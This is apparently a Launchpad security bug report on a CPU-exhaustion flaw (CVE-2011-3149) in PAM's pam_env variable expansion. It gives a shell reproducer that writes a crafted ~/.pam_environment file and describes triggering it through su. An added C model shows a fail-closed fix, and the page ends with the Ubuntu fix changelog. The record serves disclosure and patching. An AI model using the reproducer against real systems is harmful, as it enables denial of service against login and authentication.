100% CPU utilization in pam_env parsing

Bug #874565 reported by Kees Cook
Affects: pam (Ubuntu)
Status: Fix Released
Importance: Undecided
Assigned to: Unassigned
Milestone: (none)

Bug Description

The pam_env variable expansion routine does not correctly abort under some situations when expanding variable names. This triggers 100% CPU use and syslog flooding.

To reproduce:

# The heredoc delimiter must be quoted: with a bare EOM the shell would expand the
# ${EVIL_FILLER_*} references itself (to empty strings, since they are unset) and
# pam_env would never see them.
cat <<'EOM' >~/.pam_environment
EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM

This will trigger CPU usage for whatever process runs the PAM stack. For example, to make root run away, run "su - $USER" and correctly authenticate.

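The behaviour the fix in the changelog further down describes (on overflow, stop and return PAM_BUF_ERR rather than carrying on) is shown here as an added model. This is not pam_env.c and not code from the reporter or from Ubuntu: it parses a subset of the `.pam_environment` format, expands `${NAME}` references into a fixed buffer, and aborts the file on the first overflow. BUF_SIZE 8192, MAX_VARS, NAME_LEN, the function names and the subset of the file format handled are assumptions of the model; PAM_SUCCESS and PAM_BUF_ERR use the numbering from PAM's public header. The reporter's file is rebuilt in memory (constructed input, nothing is written to ~/.pam_environment), and the original looping code path is deliberately not reproduced since the page does not show it.

```c
/* Added model (not pam_env.c): ${VAR} expansion with the fail-closed bounds check the fix describes. */
#include <stdio.h>
#include <string.h>

#define PAM_SUCCESS 0   /* return codes as numbered in <security/_pam_types.h> */
#define PAM_BUF_ERR 5
#define BUF_SIZE 8192   /* assumed expansion buffer; the reproducer targets 8191+4 bytes */
#define MAX_VARS 16     /* assumption: enough entries for the demo file */
#define NAME_LEN 64     /* assumption; keep in step with the %63s below */

struct env_var   { char name[NAME_LEN]; char value[BUF_SIZE]; };
struct env_table { struct env_var vars[MAX_VARS]; int count; };

static const char *lookup(const struct env_table *t, const char *name, size_t len)
{
    for (int i = 0; i < t->count; i++)
        if (strlen(t->vars[i].name) == len && !memcmp(t->vars[i].name, name, len))
            return t->vars[i].value;
    return NULL;
}

/* Append n bytes to dst or fail closed: one log line and PAM_BUF_ERR, never a spin. */
static int append_checked(char *dst, size_t *out, const char *src, size_t n)
{
    if (*out + n >= BUF_SIZE) {
        fprintf(stderr, "pam_env model: variable too long, overflow\n");
        return PAM_BUF_ERR;
    }
    memcpy(dst + *out, src, n);
    *out += n; dst[*out] = '\0';
    return PAM_SUCCESS;
}

/* Expand ${NAME} references from src into dst (BUF_SIZE bytes). Unknown names expand
 * to nothing and expanded text is not re-scanned; the first overflow aborts. */
int expand_arg(const struct env_table *t, const char *src, char *dst)
{
    size_t out = 0;
    dst[0] = '\0';
    for (const char *p = src; *p; ) {
        if (p[0] != '$' || p[1] != '{') {              /* ordinary byte */
            if (append_checked(dst, &out, p++, 1) != PAM_SUCCESS) return PAM_BUF_ERR;
            continue;
        }
        const char *start = p + 2, *end = strchr(start, '}');
        if (!end) return append_checked(dst, &out, p, strlen(p));   /* unterminated: copy verbatim */
        const char *val = lookup(t, start, (size_t)(end - start));
        if (val && append_checked(dst, &out, val, strlen(val)) != PAM_SUCCESS)
            return PAM_BUF_ERR;                        /* the fix: stop, do not keep going */
        p = end + 1;                                   /* always move past the reference */
    }
    return PAM_SUCCESS;
}

/* Parse "NAME DEFAULT=value" lines (blank and # lines skipped; OVERRIDE=, quoting and @{item} not modelled). */
int load_pam_environment(const char *text, struct env_table *t)
{
    char buf[2 * BUF_SIZE], name[NAME_LEN];
    t->count = 0;
    for (const char *line = text; *line; ) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        if (len >= sizeof buf || t->count >= MAX_VARS) return PAM_BUF_ERR;  /* too big for the model */
        memcpy(buf, line, len); buf[len] = '\0';
        line = nl ? nl + 1 : line + len;
        int off = -1;                                  /* %n fires only if "DEFAULT=" matched */
        if (sscanf(buf, "%63s DEFAULT=%n", name, &off) != 1 || name[0] == '#')
            continue;                                  /* blank or comment line */
        struct env_var *v = &t->vars[t->count];
        strcpy(v->name, name);
        int rc = expand_arg(t, off >= 0 ? buf + off : "", v->value);
        if (rc != PAM_SUCCESS) return rc;              /* abort the file: no retry, no syslog flood */
        t->count++;                                    /* only now can later lines see this name */
    }
    return PAM_SUCCESS;
}

/* Build the reporter's reproducer in memory (constructed here, not read from ~/.pam_environment)
 * and run it. Returns the loader's status; lens[] gets the expanded lengths of the accepted lines. */
int run_reproducer(size_t lens[4], int *accepted)
{
    static char file[1024];
    static struct env_table t;                         /* ~130 KiB: keep it off the stack */
    char b255[256];
    memset(b255, 'B', 255); b255[255] = '\0';
    snprintf(file, sizeof file,
        "EVIL_FILLER_255 DEFAULT=%s\n"
        "EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B\n"
        "EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}\n"
        "EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}"
        "${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}\n"
        "EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA\n", b255);
    int rc = load_pam_environment(file, &t);
    *accepted = t.count;
    for (int i = 0; i < t.count && i < 4; i++) lens[i] = strlen(t.vars[i].value);
    return rc;
}
```

Run against the rebuilt file, the four filler lines expand to 255, 256, 1024 and 8191 bytes (8191 is the most a BUF_SIZE buffer can hold with its terminator), and the fifth line fails closed with PAM_BUF_ERR after a single log line; the loader returns that error instead of retrying, which is the property the reporter's CPU and syslog symptoms say the original code lacked.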
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Please use CVE-2011-3149

Kees Cook (kees) wrote :

I've reported this privately to upstream; waiting for a reply.

Changed in pam (Ubuntu):
status: New → Triaged
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package pam - 1.1.3-2ubuntu2.1

---------------
pam (1.1.3-2ubuntu2.1) oneiric-security; urgency=low

  * SECURITY UPDATE: possible code execution via incorrect environment file
    parsing (LP: #874469)
    - debian/patches-applied/CVE-2011-3148.patch: correctly count leading
      whitespace when parsing environment file in modules/pam_env/pam_env.c.
    - CVE-2011-3148
  * SECURITY UPDATE: denial of service via overflowed environment variable
    expansion (LP: #874565)
    - debian/patches-applied/CVE-2011-3149.patch: when overflowing, exit
      with PAM_BUF_ERR in modules/pam_env/pam_env.c.
    - CVE-2011-3149
  * SECURITY UPDATE: code execution via incorrect environment cleaning
    - debian/patches-applied/update-motd: updated to use clean environment
      and absolute paths in modules/pam_motd/pam_motd.c.
    - CVE-2011-XXXX
 -- Marc Deslauriers <email address hidden> Tue, 18 Oct 2011 09:33:47 -0400

Changed in pam (Ubuntu):
status: Triaged → Fix Released
visibility: private → public